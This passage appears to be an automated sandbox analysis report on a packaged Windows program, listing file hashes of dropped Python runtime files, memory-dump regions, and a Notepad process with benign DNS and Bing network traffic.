| SHA512 | d2006df7e81fefea2ae8a52367e7f439299e9277dfaf7018e4f2dbb5b2e600308fb159bbb1bd5ab843ef2716be2c145fd0a8af0c67d295dd6a7411252c56dc24 |
memory/3592-7-0x000000007377E000-0x000000007377F000-memory.dmp
memory/3592-8-0x0000000002F90000-0x0000000002FC6000-memory.dmp
memory/3592-9-0x0000000073770000-0x0000000073F20000-memory.dmp
memory/3592-10-0x00000000056F0000-0x0000000005D18000-memory.dmp
memory/3592-22-0x0000000073770000-0x0000000073F20000-memory.dmp
memory/3592-34-0x00000000055D0000-0x00000000055F2000-memory.dmp
memory/3592-37-0x0000000005ED0000-0x0000000005F36000-memory.dmp
memory/3592-38-0x0000000005F40000-0x0000000005FA6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pdxjz0gw.k4s.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3592-48-0x0000000005FB0000-0x0000000006304000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\onefile_4336_133633811109962119\python310.dll
| MD5 | 384349987b60775d6fc3a6d202c3e1bd |
| SHA1 | 701cb80c55f859ad4a31c53aa744a00d61e467e5 |
| SHA256 | f281c2e252ed59dd96726dbb2de529a2b07b818e9cc3799d1ffa9883e3028ed8 |
| SHA512 | 6bf3ef9f08f4fc07461b6ea8d9822568ad0a0f211e471b990f62c6713adb7b6be28b90f206a4ec0673b92bae99597d1c7785381e486f6091265c7df85ff0f9b5 |
C:\Users\Admin\AppData\Local\Temp\onefile_4336_133633811109962119\hex.exe
| MD5 | 7206826cbefb2418f63d26c4a63a0425 |
| SHA1 | 3d3532fc1afe8b288344c7ac863ca87e78235155 |
| SHA256 | 552e34c38a39d4d2dcf0db1bd20fa8b85723acbf157de6c91b046dfef1d10a88 |
| SHA512 | 0f695b64c4199be8717dc00f58371bd319122bb942a0b29cdc9f360b37e3c9d0617dc638ca9c2318ce0d714242845a482eb95ce96b064191008053160ac44fe9 |
C:\Users\Admin\AppData\Local\Temp\onefile_4336_133633811109962119\_lzma.pyd
| MD5 | 5a77a1e70e054431236adb9e46f40582 |
| SHA1 | be4a8d1618d3ad11cfdb6a366625b37c27f4611a |
| SHA256 | f125a885c10e1be4b12d988d6c19128890e7add75baa935fe1354721aa2dea3e |
| SHA512 | 3c14297a1400a93d1a01c7f8b4463bfd6be062ec08daaf5eb7fcbcde7f4fa40ae06e016ff0de16cb03b987c263876f2f437705adc66244d3ee58f23d6bf7f635 |
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_ssl.pyd
| MD5 | 11c5008e0ba2caa8adf7452f0aaafd1e |
| SHA1 | 764b33b749e3da9e716b8a853b63b2f7711fcc7c |
| SHA256 | bf63f44951f14c9d0c890415d013276498d6d59e53811bbe2fa16825710bea14 |
| SHA512 | fceb022d8694bce6504d6b64de4596e2b8252fc2427ee66300e37bcff297579cc7d32a8cb8f847408eaa716cb053e20d53e93fbd945e3f60d58214e6a969c9dd |
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_hashlib.pyd
| MD5 | cfb9e0a73a6c9d6d35c2594e52e15234 |
| SHA1 | b86042c96f2ce6d8a239b7d426f298a23df8b3b9 |
| SHA256 | 50daeb3985302a8d85ce8167b0bf08b9da43e7d51ceae50e8e1cdfb0edf218c6 |
| SHA512 | 22a5fd139d88c0eee7241c5597d8dbbf2b78841565d0ed0df62383ab50fde04b13a203bddef03530f8609f5117869ed06894a572f7655224285823385d7492d2 |
C:\Users\Admin\AppData\Local\Temp\onefile_4336_133633811109962119\unicodedata.pyd
| MD5 | a40ff441b1b612b3b9f30f28fa3c680d |
| SHA1 | 42a309992bdbb68004e2b6b60b450e964276a8fc |
| SHA256 | 9b22d93f4db077a70a1d85ffc503980903f1a88e262068dd79c6190ec7a31b08 |
| SHA512 | 5f9142b16ed7ffc0e5b17d6a4257d7249a21061fe5e928d3cde75265c2b87b723b2e7bd3109c30d2c8f83913134445e8672c98c187073368c244a476ac46c3ef |
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\certifi\cacert.pem
| MD5 | d3e74c9d33719c8ab162baa4ae743b27 |
| SHA1 | ee32f2ccd4bc56ca68441a02bf33e32dc6205c2b |
| SHA256 | 7a347ca8fef6e29f82b6e4785355a6635c17fa755e0940f65f15aa8fc7bd7f92 |
| SHA512 | e0fb35d6901a6debbf48a0655e2aa1040700eb5166e732ae2617e89ef5e6869e8ddd5c7875fa83f31d447d4abc3db14bffd29600c9af725d9b03f03363469b4c |
C:\Users\Admin\AppData\Local\Temp\onefile_4336_133633811109962119\libffi-7.dll
| MD5 | eef7981412be8ea459064d3090f4b3aa |
| SHA1 | c60da4830ce27afc234b3c3014c583f7f0a5a925 |
| SHA256 | f60dd9f2fcbd495674dfc1555effb710eb081fc7d4cae5fa58c438ab50405081 |
| SHA512 | dc9ff4202f74a13ca9949a123dff4c0223da969f49e9348feaf93da4470f7be82cfa1d392566eaaa836d77dde7193fed15a8395509f72a0e9f97c66c0a096016 |
C:\Users\Admin\AppData\Local\Temp\onefile_4336_133633811109962119\_ctypes.pyd
| MD5 | 79f339753dc8954b8eb45fe70910937e |
| SHA1 | 3ad1bf9872dc779f32795988eb85c81fe47b3dd4 |
| SHA256 | 35cdd122679041ebef264de5626b7805f3f66c8ae6cc451b8bc520be647fa007 |
| SHA512 | 21e567e813180ed0480c4b21be3e2e67974d8d787e663275be054cee0a3f5161fc39034704dbd25f1412feb021d6a21b300a32d1747dee072820be81b9d9b753 |
C:\Users\Admin\AppData\Local\Temp\onefile_4336_133633811109962119\charset_normalizer\md__mypyc.pyd
| MD5 | 494f5b9adc1cfb7fdb919c9b1af346e1 |
| SHA1 | 4a5fddd47812d19948585390f76d5435c4220e6b |
| SHA256 | ad9bcc0de6815516dfde91bb2e477f8fb5f099d7f5511d0f54b50fa77b721051 |
| SHA512 | 2c0d68da196075ea30d97b5fd853c673e28949df2b6bf005ae72fd8b60a0c036f18103c5de662cac63baaef740b65b4ed2394fcd2e6da4dfcfbeef5b64dab794 |
C:\Users\Admin\AppData\Local\Temp\onefile_4336_133633811109962119\charset_normalizer\md.pyd
| MD5 | f33ca57d413e6b5313272fa54dbc8baa |
| SHA1 | 4e0cabe7d38fe8d649a0a497ed18d4d1ca5f4c44 |
| SHA256 | 9b3d70922dcfaeb02812afa9030a40433b9d2b58bcf088781f9ab68a74d20664 |
| SHA512 | f17c06f4202b6edbb66660d68ff938d4f75b411f9fab48636c3575e42abaab6464d66cb57bce7f84e8e2b5755b6ef757a820a50c13dd5f85faa63cd553d3ff32 |
C:\Users\Admin\AppData\Local\Temp\onefile_4336_133633811109962119\_queue.pyd
| MD5 | c9ee37e9f3bffd296ade10a27c7e5b50 |
| SHA1 | b7eee121b2918b6c0997d4889cff13025af4f676 |
| SHA256 | 9ecec72c5fe3c83c122043cad8ceb80d239d99d03b8ea665490bbced183ce42a |
| SHA512 | c63bb1b5d84d027439af29c4827fa801df3a2f3d5854c7c79789cad3f5f7561eb2a7406c6f599d2ac553bc31969dc3fa9eef8648bed7282fbc5dc3fb3ba4307f |
C:\Users\Admin\AppData\Local\Temp\onefile_4336_133633811109962119\libcrypto-1_1.dll
| MD5 | 63c4f445b6998e63a1414f5765c18217 |
| SHA1 | 8c1ac1b4290b122e62f706f7434517077974f40e |
| SHA256 | 664c3e52f914e351bb8a66ce2465ee0d40acab1d2a6b3167ae6acf6f1d1724d2 |
| SHA512 | aa7bdb3c5bc8aeefbad70d785f2468acbb88ef6e6cac175da765647030734453a2836f9658dc7ce33f6fff0de85cb701c825ef5c04018d79fa1953c8ef946afd |
C:\Users\Admin\AppData\Local\Temp\onefile_4336_133633811109962119\libssl-1_1.dll
| MD5 | bd857f444ebbf147a8fcd1215efe79fc |
| SHA1 | 1550e0d241c27f41c63f197b1bd669591a20c15b |
| SHA256 | b7c0e42c1a60a2a062b899c8d4ebd0c50ef956177ba21785ce07c517c143aeaf |
| SHA512 | 2b85c1521edeadf7e118610d6546fafbbad43c288a7f0f9d38d97c4423a541dfac686634cde956812916830fbb4aad8351a23d95cd490c4a5c0f628244d30f0a |
C:\Users\Admin\AppData\Local\Temp\onefile_4336_133633811109962119\select.pyd
| MD5 | 78d421a4e6b06b5561c45b9a5c6f86b1 |
| SHA1 | c70747d3f2d26a92a0fe0b353f1d1d01693929ac |
| SHA256 | f1694ce82da997faa89a9d22d469bfc94abb0f2063a69ec9b953bc085c2cb823 |
| SHA512 | 83e02963c9726a40cd4608b69b4cdf697e41c9eedfb2d48f3c02c91500e212e7e0ab03e6b3f70f42e16e734e572593f27b016b901c8aa75f674b6e0fbb735012 |
C:\Users\Admin\AppData\Local\Temp\onefile_4336_133633811109962119\_socket.pyd
| MD5 | 5dd51579fa9b6a06336854889562bec0 |
| SHA1 | 99c0ed0a15ed450279b01d95b75c162628c9be1d |
| SHA256 | 3669e56e99ae3a944fbe7845f0be05aea96a603717e883d56a27dc356f8c2f2c |
| SHA512 | 7aa6c6587890ae8c3f9a5e97ebde689243ac5b9abb9b1e887f29c53eef99a53e4b4ec100c03e1c043e2f0d330e7af444c3ca886c9a5e338c2ea42aaacae09f3e |
C:\Users\Admin\AppData\Local\Temp\onefile_4336_133633811109962119\_bz2.pyd
| MD5 | b45e82a398713163216984f2feba88f6 |
| SHA1 | eaaf4b91db6f67d7c57c2711f4e968ce0fe5d839 |
| SHA256 | 4c2649dc69a8874b91646723aacb84c565efeaa4277c46392055bca9a10497a8 |
| SHA512 | b9c4f22dc4b52815c407ab94d18a7f2e1e4f2250aecdb2e75119150e69b006ed69f3000622ec63eabcf0886b7f56ffdb154e0bf57d8f7f45c3b1dd5c18b84ec8 |
C:\Users\Admin\AppData\Local\Temp\onefile_4336_133633811109962119\vcruntime140.dll
| MD5 | 11d9ac94e8cb17bd23dea89f8e757f18 |
| SHA1 | d4fb80a512486821ad320c4fd67abcae63005158 |
| SHA256 | e1d6f78a72836ea120bd27a33ae89cbdc3f3ca7d9d0231aaa3aac91996d2fa4e |
| SHA512 | aa6afd6bea27f554e3646152d8c4f96f7bcaaa4933f8b7c04346e410f93f23cfa6d29362fd5d51ccbb8b6223e094cd89e351f072ad0517553703f5bf9de28778 |
memory/3592-86-0x0000000006580000-0x000000000659E000-memory.dmp
memory/3592-87-0x00000000068E0000-0x000000000692C000-memory.dmp
memory/3592-88-0x0000000007BC0000-0x000000000823A000-memory.dmp
memory/3592-89-0x0000000006AB0000-0x0000000006ACA000-memory.dmp
memory/3592-90-0x00000000087F0000-0x0000000008D94000-memory.dmp
memory/3592-91-0x0000000007950000-0x00000000079E2000-memory.dmp
memory/3592-94-0x0000000073770000-0x0000000073F20000-memory.dmp
Analysis: behavioral8
Detonation Overview
Submitted
2024-06-20 18:17
Reported
2024-06-20 18:48
Platform
win10v2004-20240611-en
Max time kernel
1385s
Max time network
1170s
Command Line
Signatures
Processes
C:\Windows\system32\NOTEPAD.EXE
C:\Windows\system32\NOTEPAD.EXE "C:\Users\Admin\AppData\Local\Temp\Cryptic Release V1.4.4\workspace\Saved Scripts.txt"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 211.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.15.31.184.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 105.83.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 10.28.171.150.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.173.189.20.in-addr.arpa | udp |